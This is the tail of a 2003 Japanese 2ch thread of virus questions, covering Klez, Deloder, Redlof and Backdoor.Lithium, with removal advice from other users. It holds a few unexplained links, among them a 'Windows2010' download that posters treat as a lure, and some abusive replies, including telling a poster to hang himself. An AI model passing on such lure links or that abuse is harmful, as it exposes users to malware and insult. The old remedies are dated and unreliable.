( ´,_ゝ`)プッ MSNの送信履歴に残ってるんだろうか?
         読んだ限りではMSNや漏まいのPCとは関係ない気がするが・・別の所でたまたまメアドをKlezに拾われてたとか・・

         もし、MSN Messenger・Hotmail・JavaScript(JavaScript型ウィルス含)等が巧妙に絡んだ話なら
         報告宜敷く
         

903 :名無しさん@お腹いっぱい。:03/04/18 23:05
>>902
Webメールなのですがどうやら電話帳に載っているアドレスではなく
メッセンジャーに登録している人のアドレスに送られているようです…
続報はわかりしだい書き込みます。

904 :名無しさん@お腹いっぱい。:03/04/18 23:20
>>903
( ´,_ゝ`)プッ なら、IEは最新のパッチあてとけ。JavaScript類も無効。
        パス抜かれてそのままHotmailにログインも可能じゃなかろうか。

905 :名無しさん@お腹いっぱい。:03/04/19 00:13
>>904
それがすべて最新のパッチをあてたばっかりなんですよ…

906 :名無しさん@お腹いっぱい。:03/04/19 00:45
>>905
話の流れがよく分からんから元レス番号入れてよ。
一番最初は>>892

で、そのぁゃιぃメールを確保して、ヘッダ吊るすなり本体吊るすなりすれば
解決は早いと思うけど・・・

907 :892:03/04/19 01:52
>>892 = >>896 = >>899 = >>903
です、すみません。ID制の板にずっといたもので…
あーそうなんですけど消しちゃったんですよね…
また同じメールきたらヘッダなりさらします

908 :名無しさん@お腹いっぱい。:03/04/19 10:44
自分のPCが感染したわけではないのですが、
PCの電源を入れてしばらくすると画面が激しくぶれるというか、
TVでいう砂嵐みたいな状態になって、時間がたつにつれてそれがひどくなり、
最後には全然画面が見えない状態になってしまうという状態になるウイルスの名前は何だか分かりますか?
そのPCは修理に出して(画面の故障だと思っていたらしい)、チェックしたらウイルスだと分かったらしいんですが。
修理に出す前に家でウイルスチェックしようとしたのですが、画面が見えなくなってしまうので出来ませんでした。



909 :908:03/04/19 10:49
ちなみにホットメールしか使ってないので
メールからの感染ではないと思います。
特にファイルをDLしたりもしてなかったようです。

910 :名無しさん@お腹いっぱい。:03/04/19 11:41
>>908-909
ウイルス名を書け。

911 :名無しさん@お腹いっぱい。:03/04/19 11:41
訂正。

>チェックしたらウイルスだと分かったらしいんですが。

だから、その修理に出したところが検出したウイルス名を聞け。

912 :名無しさん@お腹いっぱい。:03/04/19 13:21
感じ悪いなココ

913 :名無しさん@お腹いっぱい。:03/04/19 13:26
>>909
> 特にファイルをDLしたりもしてなかったようです
ウイルスに感染するような奴のいってる事は信頼性が無い。
ま、感染源はネット以外でもCDROMからとかあるわけだし。
判断できない奴はアンチウイルス買えということだな。

914 :名無しさん@お腹いっぱい。:03/04/19 13:47
>>912.
当然だろ、お前がいるからな。

915 :892:03/04/19 22:30
返信してもらいました!
ヘッダっていうのかな?はこんな感じです

>From: **** <****@hotmail.com>
>To: ****@hotmail.com
>Subject: Introduction on ADSL
>Date: Sat, 19 Apr 2003 20:32:16 +0900 (JST)
>
>Content-Type: application/octet-stream;
>name=s_CKO1001[1].jpg
>Content-Transfer-Encoding: base64
>Content-ID: <IX1HSi5199>


916 :名無しさん@お腹いっぱい。:03/04/20 00:14
>>892
Recieved:がなければ何の役にも立たない。Return-Path:があると役に立つこともある。

917 :山崎渉:03/04/20 05:59
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

918 :名無しさん@お腹いっぱい。:03/04/20 08:43
すいません↓のソフト?がパソコン起動時急に出るようになりました。
ttp://www.42ch.net/UploaderSmall/source/1050795497.gif
これウイルスですよね?前にも一度だけ、これに引っかかってしまい。
そこで謎なんですが、どこで感染するのでしょうか?このウイルスは・・。
ありがちなケースで、全く身に覚えが無いのですよ。

どこで感染するかわかれば今後、気をつけて行こうと思うのですが・・。
宜しくお願いしますm(__)m

919 :名無しさん@お腹いっぱい。:03/04/20 10:02
>>918
http://www.ipa.go.jp/security/topics/newvirus/deloder.html

920 :cheshire-cat ◆CATBCJABLA :03/04/20 10:15
>>918
Deloderかと。
http://www.mnet.ne.jp/virus/deloder.htm

921 :cheshire-cat ◆CATBCJABLA :03/04/20 10:16
ありゃ、随分遅くかぶった。

922 :918:03/04/20 12:24
>>919
>>920
なるほど、情報ありがとうございました。
今後注意します。

923 :こんなの書かれたんですが?:03/04/20 13:25
33 名前:プロバイダー@”管理”者 :03/04/20 12:03

只今、上記のURLを貼付された方へ。
管理者がプロバイダーに苦情のメールを
送信されました。尚、後日貴方様が契約
されたプロバイダーよりメールまたは電話での
御連絡がありますのでその方留意下さいますよう
お願い申し上げます。

http://qb.2ch.net/test/read.cgi/sec2ch/1047844846/l50
参考までにこちらでお確かめください。

ほんとうですか?

924 :名無しさん@お腹いっぱい。:03/04/20 13:28
>>923はマルチなんで放置でよろ

925 :名無しさん@お腹いっぱい。:03/04/20 13:33
>>924 本当ですか....小心者なのでフルエテマシタ 
    もうブラクらなんて貼りません

926 :最後にお願いします:03/04/20 13:48
マルチなんで放置でよろ
↑↑
マルチってマルチ商法のことですか?用語集に載ってなかったので。


927 :名無しさん@お腹いっぱい。:03/04/20 13:53
>>926
セキュリティ初心者質問スレッドpart23
http://pc.2ch.net/test/read.cgi/sec/1050042334/339

928 :332、334、338、441:03/04/20 13:58
>>927 向こうにも書きましたが本当にすみません。これから気をつけます。

929 :名無しさん@お腹いっぱい。:03/04/20 21:19
age

930 :名無しさん@お腹いっぱい。:03/04/20 21:22
今ウイルスに感染しました。ってレッドスクリーンになって検疫をクリック
したんだけどダメみたいで再起動したのですが、一応何とも無いみたいです。
このままにしといていいんでしょうか?NAV入れてあるんですけど
感染してしまいショックです。


931 :cheshire-cat ◆CATBCJABLA :03/04/20 21:58
>>930
感染をブロックできた、ってのではないんでしょか。
画面右下のタスクトレイからNortonをダブルクリック。
Norton Anti Virusのレポート→検疫項目と活動ログみてみ。

932 :名無しさん@お腹いっぱい。:03/04/20 22:43
感染したっぽいです。
症状
PC立ち上げるとマウスポインタが
「今日は気分がいいので飛び跳ねます」とかでて勝手にポインタが動き回ります。
svchost.exeが勝手にインターネットにアクセスします。
NAVでは特に反応ありませんでした。感染原因はおそらく自宅鯖運営のためport80
を開放していたためだと思います。OSはXPです。
駆除方法知ってる方、力を貸していただきたいです。

933 :_:03/04/20 22:45
>>932
ウィルスチェックをしてから聞け
>>1を読め!!

934 :cheshire-cat ◆CATBCJABLA :03/04/20 22:54
>>933
そゆのって、アンチウイルスソフトではヒットしないかも。

>>932
漏れは知らんけど。
後学のために、経緯をちゃんと書いて欲しいでし。
そゆ現象が起きる頃に作成された・もしくは改変されたファイルは無いでしょか。
スタート→検索で、日付を元に検索して下され。

それと「Ctrl Alt Del」を一度に押して、プロセスタブの中を報告してくだされ。

935 :cheshire-cat ◆CATBCJABLA :03/04/20 22:56
>>932
追記。
既存のファイル改ざんじゃなくてゴミ突っ込み系なら、これ見てちょ。
http://members.tripod.co.jp/tef_tef/tips/startup.html


936 :名無しさん@お腹いっぱい。:03/04/20 23:00
ゴミ突っ込まれたなら他に何されてるかわからないから、俺ならクリーンインストする。

937 :cheshire-cat ◆CATBCJABLA :03/04/20 23:04
>>936
それが一番確実だと思いまする。
実際そですよねん。

938 :名無しさん@お腹いっぱい。:03/04/20 23:12
932です。オンラインスキャンでは異常ないです。4/20で検索したら,
systemフォルダの中にピカチュウのアイコンのpika.exeってのが入っ
てました。同様にsystem32のなかにIEXPL0RE.exeっていうのも入っ
てました。怪しいのはこれぐらいです。確か今までなかったと思います。

>>935
見れませんでした
プロセスタブはたくさん動いてるで何を見ればいいのかよくわかんないです。

939 :cheshire-cat ◆CATBCJABLA :03/04/20 23:27
>>932
んではとりあえず、スタート→ファイル名を指定して実行→msconfig→全般タブ→システムの復元から、問題が起きる以前の日付のバックアップポイントを利用して復元してみてちょ。


940 :名無しさん@お腹いっぱい。:03/04/20 23:45
実行しました。おかげで立ち上げたときのマウスの奴はでなくなりました。
しかし結局何が原因だったかわかってないです。それになぜかNAVの定義
ファイルがアップロードしてもエラーになってしまうんですよね。
ほかにも悪さしてるのがあるのかもしれないです。
どっちにしてもこのまま使うのは気持ちが悪いのでクリーンインストします。

941 :名無しさん@お腹いっぱい。:03/04/20 23:48
Backdoor.Lithium
Backdoor.Lithium はハッカーが感染先コンピュータをリモートから制御できるようにします。
別名: BackDoor-YQ, TROJ_LITH, Troj/Bdoor-YQ
種別: トロイの木馬

今日、またーりネットサーフィンしてたら、windows上のファイルが勝手に開いて
自分のちんぽ激写した写真ファイルを見られますた(´Д⊂グスン

とりあえず感染したファイルは削除したんだけどほかにもなにかしないといけないのでしょうか?
おながいします。もう漏れのSM写真みられたくないんでつ。゚(゚´Д`゚)゚。

942 :cheshire-cat ◆CATBCJABLA :03/04/20 23:51
>>940
Nortonの定義ファイルの問題っすけど。
日付が不整合になるためらしですけど(漏れも一度それで死にますた
Nortonの関連ファイルをメチャ消すと解消しますが。
そゆ面倒な事しなくても、次回のUpdate時ならちゃんとインスコできますよん。

943 :名無しさん@お腹いっぱい。:03/04/20 23:54
>>940
そうなのですか。どうもいろいろありがとうございます。
今度からセキュリティは厳しくしたいと思います。どうせ大丈夫だろは
いけないですね。

944 :名無しさん@お腹いっぱい。:03/04/21 01:56
redlofに掛かった・・・
関連サイト見た所駆除めんどそうだし、いい機会だから再インスコするか

945 :名無しさん@お腹いっぱい。:03/04/21 02:14
シマンテックのオンラインスキャンをした所、2chのログにVBS.LoveLetter.Aが反応したのですが
これって上の方でも言ってたソースコードのレスが引っ掛かってるって奴ですよね?

946 :名無しさん@お腹いっぱい。:03/04/21 08:12
>>945
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/

947 :名無しさん@お腹いっぱい。:03/04/21 15:54
http://members.jcom.home.ne.jp/i-am-a-student-boy/index1.html
すっげぇ〜面白いものみつけた・・・。
しかもこの恐怖感・・・。
勇気のある人はこのサイトに言って、Windows2010って奴落としてみて。
報告おながいしまつ。

948 :名無しさん@お腹いっぱい。:03/04/21 16:03
>>947
この板では鑑定はしない。回線切って首吊って死んでくれ。

949 :名無しさん@お腹いっぱい。:03/04/21 16:04
>>947
この板では鑑定はやらない。

ラウンジの
勇気がなくて見られない画像解説スレPart340
http://ex.2ch.net/test/read.cgi/entrance/1050843820/l50へどうぞ。

950 :949:03/04/21 16:06
かぶったから、漏れも
回線切って首吊って死んでくれ>947
と付け加えておく(w

951 :名無しさん@お腹いっぱい。:03/04/21 16:06
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

952 :947:03/04/21 16:09
>>948
>>949
俺は死なない。
みたい奴だけ見れば良い話。

953 :名無しさん@お腹いっぱい。:03/04/21 16:21
>>952
どっか逝け

954 :名無しさん@お腹いっぱい。:03/04/21 17:36
VBS.Redlof.Aに感染したんで駆除したのだが、何故かレジストリは変更されてなかった模様
redlof実行時に生成されるというファイルも見つからないんで大丈夫そうではあるが、なんかかえって気持ち悪い…
いっその事スパーリと再インスコした方がいいのだろうか?

955 :名無しさん@お腹いっぱい。:03/04/21 18:28
本当に「見たい人だけが見れば良い」と思ってるならまずここに書かないだろ。
>>952みたいなのが一番たちが悪い。
それなら「これ見ろや」と言って書き込むやつのほうが良いよ。

956 :名無しさん@お腹いっぱい。:03/04/21 20:24
ローカルディスクが勝手に共有設定になるんだけど
これって普通?
ウィルス?
スキャンしても何も出てこないし誰か頼む

957 :名無しさん@お腹いっぱい。:03/04/21 20:29
>>956
OSも書かずにレスがつくと思うな。

958 :947:03/04/21 20:29
>>955
いや、珍しく面白いサイト見つけたので、
まあ楽しめや感覚で書き込んだ。
最初は、お前等これ見ろ!って書き込もうと思ったが。
まあ楽しめば良いじゃないか(藁

959 :名無しさん@お腹いっぱい。:03/04/21 20:41
>>958
まだいたのか。よそでやってくれ。
この板では誰もクリックしないよ。

960 :名無しさん@お腹いっぱい。:03/04/21 20:42
>>956
管理共有に1マンペソ

961 :名無しさん@お腹いっぱい。:03/04/22 10:39
まだいたのか。よそでやってくれ。
この板では誰もクリックしないよ。


962 :名無しさん@お腹いっぱい。:03/04/22 12:47
アプリやファイル消していっても
その度にHD容量減って行くっていうのは
なんてウィルス?

963 :名無しさん@お腹いっぱい。:03/04/22 14:10
>>962ウイルス。

ゴミ箱からにしろ。

964 :名無しさん@お腹いっぱい。:03/04/22 14:13
>>962
>>963
まだいたのか。よそでやってくれ。
この板では誰もクリックしないよ。

965 :bloom:03/04/22 14:28
http://homepage.mac.com/ayaya16/

966 :名無しさん@お腹いっぱい。:03/04/22 14:51
>>961>>964コピペウザイ
悔しくて仕方ないんだろうが、荒らしにまで転落することもないと思うぞ。
まっとうな道を歩め。
他の質問者の邪魔だけはするな。

967 :名無しさん@お腹いっぱい。:03/04/22 15:21
>>966
別に煽ってないよIDで確認しないでよキモいから

968 :名無しさん@お腹いっぱい。:03/04/22 16:30
《我是警察》
?个警官出去打?,其中的一个人却是第一次打?,所以他?得有些激?。打??始了,?名警官找到了一个?鹿群很近的密林,等待着鹿群的接近。。。鹿群慢慢的向他走来,他得手心?始出汗,他?上眼猛地从?林中跳了出来,向天空打了一?,并喊到:“都不??,我是警察!”
??家具行?的商??利?件


969 :名無しさん@お腹いっぱい。:03/04/22 16:33
つづき
《商智?子商?系??件》是一套???助家具行?利用互?
网,来拓展市?的一套网上??系?工具,?有效地解决了企?
的?品?售、?存??、采??价、?取定?以及生???工率不足等??,
并能?企??来直接的??效益(?套2800元)。?迎免?索取登??号与密?,免??用?征各地独家代理!商智?子商??件,????得更容易!


970 :名無しさん@お腹いっぱい。:03/04/22 16:34
深?市斯盛科技??有限公司市?部

??:0755-26530108;0755-26530418?

email:ss-liuzy@163.com

?系人:?先生

MSN: ss_liuzy@hotmail.com

QQ: 11730952

如果?封?件打?了?,我?感到很抱歉,?件退??
Email至如下地址:ss-liuzy@163.com
こんなメールに悩まされています
意味分かる人いますか



971 :名無しさん@お腹いっぱい。:03/04/22 16:37
>>970
ただのSPAM。セキュリティとは何の関係も無い。

972 :名無しさん@お腹いっぱい。:03/04/22 16:38
そうですか。よかったありがとうございます。

973 :名無しさん@お腹いっぱい。:03/04/22 17:09
>>970.
メールでアドレスを削除設定すれば気にならなくなるよ。
メールソフトやプロバイダによっては落とす前に、
サーバー上で除去できるものやところもあるから、
とりあえず、自分の環境を調べて見ると良いですよ。

内容は>>971さんの言った通り、ただのスパムなので、
ランダムに送ってるのか、
悪意を持ったサイトを訪れたときに標準アドを取られて送られたんでしょう。
無視するのが一番。

974 :名無しさん@お腹いっぱい。:03/04/22 17:42
発信元IPアドレスを偽装して
137番ポート(UDP)を叩かれてまーす。

こんなん↓
Incoming 22/Apr/2003 16:55:20 UDP 137 192.168.0.13

フレッツADSLでルータは使ってないので
こんなとこからパケットがくるはず無いんだけど…

新種?

975 :cheshire-cat ◆CATBCJABLA :03/04/22 21:44
>>974
1)君のLAN内部(モデム-パソ→他のパソ)
じゃなければ。
2)同じプロバのほかのパソで、妙な設定してるヤシがいる。

プロバに連絡してみ。

976 :名無しさん@お腹いっぱい。:03/04/23 01:48
>>962
君のおつむがウィルス

977 :名無しさん@お腹いっぱい。:03/04/23 16:22
>>975
レスありがと。
インターネット接続共有もしていないので
どこぞに変な設定をしているやつがいるって事ですか。
繋ぎ直したら来なくなったんでもういいんですけどね。

978 :名無しさん@お腹いっぱい。:03/04/24 00:48
PC を起動して3時間たつと、いきなりファイルが消されるんですが
何か心当たりとか無いでしょうか?
VB2003 の最新のパターンファイルでは何も検出されませんでした。
OS は XP Home を複数のユーザーで使用しています。
症状が出始めたときは Administrator のパスワードを設定していませんでした。

レジストリ

HKEY_CURRENT_USER\...\Run
 ctfmon.exe    C:\windows\System32\ctfmon.exe
HKEY_LOCAL_MACHINE\...\Run
 CloneCDElbyCDFL    "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
 IMJPMIG8.1    C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
 PCCClient.exe    "C:\Program Files\Trend Micro\Virus Buster 2003\PCCClient.exe"
 pccguide.exe    "C:\Program Files\Trend Micro\Virus Buster 2003\pccguide.exe"
 PHIME2002A    C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
 PHIME2002ASync    C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
 Pop3trap.exe    "C:\Program Files\Trend Micro\Virus Buster 2003\Pop3trap.exe"
 QuickTime Task    "C:\Program Files\QuickTime\qttask.exe" -atboottime
 SoundMan    soundman.exe
 TkBellExe    "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
 TM Outbreak Agent    "C:\Program Files\Trend Micro\Virus Buster 2003\TMOAgent.exe" /run

979 :名無しさん@お腹いっぱい。:03/04/24 00:55
>>978
もしPCを直接WANに繋いでいたのなら
一回Windowsを再インストールした方がいいです。

980 :名無しさん@お腹いっぱい。:03/04/24 04:48
デロダーにやられました

981 :名無しさん@お腹いっぱい。:03/04/24 11:22
デロダーって仮面ライダーの悪役怪獣に出てきそうな名前だな。

982 :名無しさん@お腹いっぱい。:03/04/24 11:23
次スレ立て、どなたかお願いします。

983 :名無しさん@お腹いっぱい。:03/04/24 12:14
良い機会だから、質問スレの数を減らせば?

984 :名無しさん@お腹いっぱい。:03/04/24 12:17
>>983
ウィルス系と初心者・くだ質系の2つにする?

985 :名無しさん@お腹いっぱい。:03/04/24 12:41
>>976
レスありがと。

986 :A:03/04/24 12:53
http://pc.2ch.net/test/read.cgi/sec/1051155882/
☆ウィルス情報&質問 総合スレッド☆part10



987 :978:03/04/25 01:55
>>979
やっぱ、それしかないですね……。
レスありがとうございました。

988 :名無しさん@お腹いっぱい。:03/04/25 02:17
>>986
お疲れさんです!

989 :名無しさん@お腹いっぱい。:03/04/26 00:27
さっき久々にオンラインウイルススキャンをすると、
BKDR_BHIROT.A  情報なし
C_BHIROT.A ↓
>これはIRCスクリプトで記述された「トロイの木馬型」不正プログラムで、
>mIRCバージョン6.03と連動して不正活動を行うIRCボットです。
>UPX形式で圧縮された状態で届き、展開後に作成されるファイル名は"task.exe"です。
>圧縮状態のこのmIRCプログラムはトレンドマイクロ製品でBKDR_BHIROT.Aとして検出できます。
が見つかりました。

意味がわからないのは、
>>UPX形式で圧縮された状態で届き、
どこから来るものなのでしょうか?メールでしょうか?どこかのサイトに行ったからでしょうか?
また、前者のウイルス情報がなくて困ってます。
どなたか心辺りありませんか?
宜しくお願いしますm(__)m

990 :bloom:03/04/26 00:29
http://homepage.mac.com/ayaya16/

991 :989:03/04/26 00:30
ゴメン・・同様してて、
前者のウイルス、
>圧縮状態のこのmIRCプログラムはトレンドマイクロ製品で
>「BKDR_BHIROT.A」として検出できます
ちゃんと書いてあった・・。
でもどこから感染したのかは不明です。

992 :名無しさん@お腹いっぱい。:03/04/26 00:36
1000

993 :989:03/04/26 00:37
>>992
たびたびすみません・・。
新スレ立ってた。

994 :名無しさん@お腹いっぱい。:03/04/26 03:29
  ___                   ___    
 /  __ ヽ    /  /  /  / ヽ ヽ  / __ ヽ   
 | γ  / |   /  /  /  /   ヽ ヽ | γ  / |  
 | ヽ__ノ  /  /  /  /    ヽ ヽ | ヽ__ノ   
 ヽ___丿/ / / /     ヽ ヽヽ___丿   
   /                        \ 
  /          _ノ        ,_ノ    ヽ 
  /         / iニ)ヽ,        /rj:ヽヽ    ヽ
 .|         ;〈 !:::::::c!      ' {.::::::;、! 〉    | 
 |          (つ`''"    __ `'ー''(つ     |    
 |      /////         |    |      ///   |    
 ヽ    γ´~⌒ヽ.       /     |        / <泣いちゃうで?   
  ヽ   /      ヽ    /      |      /⌒ヽ、  
   \/       |    | ̄ ̄ ̄ ̄|     /    ヽ 

995 :995:03/04/26 17:30
>>994
泣かないで・・・

996 :996:03/04/26 17:32
age

997 :名無しさん@お腹いっぱい。:03/04/26 17:34
997

998 :名無しさん@お腹いっぱい。:03/04/26 17:34
dareka 1000 wo tore

999 :名無しさん@お腹いっぱい。:03/04/26 17:35
銀河鉄道999

1000 :1000:03/04/26 17:35
1000!

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

272 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)